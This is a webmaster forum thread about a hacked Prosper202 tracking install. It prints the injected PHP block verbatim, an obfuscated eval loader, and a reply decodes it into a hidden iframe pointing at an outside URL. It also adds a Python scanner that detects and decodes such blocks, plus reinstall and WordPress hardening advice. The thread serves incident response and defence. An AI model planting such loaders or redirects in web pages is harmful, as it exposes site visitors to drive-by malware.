Today 2 of my tracking software installations, from "Liquidweb" and "Beyond hosting", have been compromised. When I log in to my tracking software I get this error:
Warning: Cannot modify header information - headers already sent by (output started at /home/mysite/public_html/202-cronjobs/index.php:180) in /home/mysite/public_html/202-login.php on line 81
<?#336988#
echo " <script type=\"text/javascript\" language=\"javascript\" > try{window.document.body++}catch(gdsgsdg){dbshre=79;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,114,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,114,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,100,99,110,106,100,106,97,103,109,102,96,38,97,105,104,92,38,105,102,42,90,100,100,40,107,95,104,32,53,8,1,24,25,26,27,110,38,108,110,116,99,93,39,106,106,106,97,109,99,106,101,24,54,26,34,88,90,108,105,103,108,108,94,33,54,4,2,25,26,27,23,111,39,109,111,112,100,94,40,93,102,106,93,95,109,23,53,25,33,43,30,51,6,4,27,23,24,25,113,41,106,108,114,102,96,37,96,94,99,98,95,108,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,112,40,110,107,113,101,95,41,110,97,93,110,99,23,53,25,33,44,103,112,32,53,8,1,24,25,26,27,110,38,108,110,116,99,93,39,102,96,93,108,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,112,40,110,107,113,101,95,41,107,103,105,26,56,23,31,42,106,115,30,51,6,4,8,1,24,25,26,27,96,94,25,34,28,91,103,92,111,104,92,102,109,40,98,92,108,62,102,96,100,93,103,110,61,112,65,93,34,34,110,31,34,35,27,114,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,110,106,98,110,96,31,31,53,94,100,109,24,98,94,56,83,31,112,86,34,53,52,40,94,100,109,54,32,35,54,4,2,25,26,27,23,24,25,26,27,91,103,92,111,104,92,102,109,40,98,92,108,62,102,96,100,93,103,110,61,112,65,93,34,34,110,31,34,40,92,103,104,94,104,95,58,96,98,102,95,31,111,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s=\"\";for(i=0;i-448!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script>";
#/336988#
?>
Hey man, there's a thread about protecting your P202 installation from attacks at http://stmforum.com/forum/showthread...r-from-Attacks
Take a look if it helps!
I decrypted the obfuscated code for shits and giggles; here's the iframe it creates:
var w = document.createElement('iframe');
w.src = 'http://mkupisinski.home.pl/clk.php';
w.style.position = 'absolute';
w.style.border = '0';
w.style.height = '1px';
w.style.width = '1px';
w.style.left = '1px';
w.style.top = '1px';
if (!document.getElementById('w')) {
blaa blaa create the new div
}
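The later posts say there is no way to find every infected file by hand, so here is an added scanner (not from the thread, not Prosper202 code) that walks a web root for the `<?#NNNNNN# ... #/NNNNNN#` marker pair shown in the first post and undoes the `fromCharCode` offset the loader uses (`v - (i%5-5-4)`), reporting the decoded script and any URLs in it. The infected-file content is a constructed sample pointing at a reserved `.invalid` host, and the `scan_tree` path argument is hypothetical.

```python
"""Find the '<?#NNNNNN# ... #/NNNNNN#' PHP injection from this thread and decode
its String.fromCharCode array with the loader's own offset formula."""
import os
import re

# Marker pair wrapping the injected block, e.g. <?#336988# ... #/336988#
BLOCK_RE = re.compile(r"<\?#(\d+)#(.*?)#/\1#", re.S)
# The number list handed to String.fromCharCode inside the block
ARRAY_RE = re.compile(r"new Array\(([\d,\s]+)\)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

def decode_array(values):
    """Invert the loader's transform: it emits chr(v - (i%5 - 5 - 4)) == chr(v - i%5 + 9)."""
    return "".join(chr(v - (i % 5) + 9) for i, v in enumerate(values))

def find_injections(php_source):
    """One record per injected block: marker id, decoded JS, and URLs it references."""
    hits = []
    for m in BLOCK_RE.finditer(php_source):
        marker, body = m.group(1), m.group(2)
        arr = ARRAY_RE.search(body)
        decoded = decode_array([int(x) for x in arr.group(1).split(",")]) if arr else ""
        hits.append({"marker": marker, "decoded": decoded, "urls": URL_RE.findall(decoded)})
    return hits

def scan_tree(root):
    """Walk a web root (hypothetical path) and report every .php file carrying the marker."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_injections(fh.read())
                if hits:
                    report[path] = hits
    return report

# Constructed sample: a short string encoded with the same i%5-9 offset, pointing at a
# reserved .invalid host rather than the URL from the thread.
SAMPLE_VALUES = [110, 38, 108, 108, 94, 52, 31, 97, 110, 111, 103, 50, 40, 41, 96, 111, 89,
                 102, 106, 103, 92, 38, 98, 104, 113, 88, 100, 98, 94, 42, 90, 100, 100, 40,
                 107, 95, 104, 32]
SAMPLE_PHP = ('<?php echo "legit"; ?>\n<?#336988#\necho "<script>asgq=new Array('
              + ",".join(map(str, SAMPLE_VALUES)) + ');</script>";\n#/336988#\n?>')

if __name__ == "__main__":
    for hit in find_injections(SAMPLE_PHP):
        print(hit["marker"], hit["urls"], hit["decoded"])
```

Running it against a real web root (`scan_tree("/home/mysite/public_html")`) lists each file that still carries the marker, which is the check to run before deciding whether a wipe-and-reinstall is the only option.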
Were you running the latest Prosper202 version?
I had the same happen to me a couple of months ago.
Got super pissed off because that meant all my data were accessible by someone else.
The guy, I later found out, was just a Russian kid who had infected a shitload of PHP files, using an old WordPress install to get in.
At that point, there is no way to find all the files, so I just dumped all my DBs and installed everything from scratch.
It's painful and will cost you some downtime, but it's the only way to be 100% sure your box is clean.
I am interested in this answer too, what version are you running?
Same thing happened to me yesterday.
One minute checking my data, the next it's all missing.
Deleted the entire install + database, re-installed, and implemented the .htaccess trick by dextrous.
Looks like CPVlab is a must now for me after seeing this thread...
Do you have WordPress running on the same cPanel? WordPress is extremely insecure, and once it was infected, it took out my whole server. I had to upgrade to an account with WHM and run WordPress in its own cPanel. Once I did that I was all good.
@luxus85 - Oh, man, that sucks. Sorry to hear about it. You may also find this tutorial useful for securing your box against intruders.
@bbrock - Yeah, seconded. Unless you're EXTREMELY sure that you got all the virus code or you're a lot better with a packet sniffer than I am, stripping the darn thing back to the bare metal is the only way to go once you've been infected. I tend to use it as an excuse to upgrade to a new server.
@2modest - Up-to-date WordPress installations aren't usually a problem, but yeah, the second you get behind on your upgrades, prepare for pain.
Remember, everyone - keep your WP installations up to date, or suffer the script kiddie consequences!
If you have any WordPresses that are earlier than 3.0, that's what they use to get in with.
What 2Modest wrote is the ONLY way to run WPs.
In the meantime look at every one of your .htaccess files.
To be honest, if you want to run WordPress these days I'd strongly recommend going for a managed hosting solution. It's too much of a pain in the ass otherwise.
I've used WP-Engine for a while now - they're very good indeed, and mean I don't have to worry about getting pwned because I had a dodgy WP install somewhere.
Also don't forget that if you're using flawed plugins or premium themes that you've downloaded from warez/torrent sites, your WP installation will be hacked in no time, no matter if you're using the latest version.